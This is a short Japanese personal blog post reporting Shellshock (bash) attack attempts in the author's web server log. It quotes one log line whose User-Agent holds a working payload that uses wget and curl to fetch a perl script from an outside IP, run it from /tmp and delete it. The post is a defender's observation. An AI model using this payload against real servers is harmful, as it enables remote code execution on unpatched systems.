PC大好きオヤヂのブログ
PCの機能を100%使うために!
2015年2月27日金曜日
bashショック脆弱性へのアタックログ
bashショック脆弱性を狙ったアタックログが頻発してきている。
50.22.0.250 - - [26/Feb/2015:17:23:31 +0900] "GET HTTP/1.1 HTTP/1.1" 400 306 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://87.106.130.7/ou.pl -O /tmp/b.pl;curl -O /tmp/b.pl http://87.106.130.7/ou.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'"
この例だと、perlでとあるホスト87.106.130.7(s15499496.onlinehome-server.info)からスクリプトを読んで、/tmp/b.plに書いてcurlで実行して消す。見たいな動作ですね。
アクセス先は、50.22.0.250(via.softinet.com)なんだけど両方ともリモート操作されてるんだろうか?
0 件のコメント:
コメントを投稿
次の投稿
前の投稿
ホーム
登録:
コメントの投稿 (Atom)
0 件のコメント:
コメントを投稿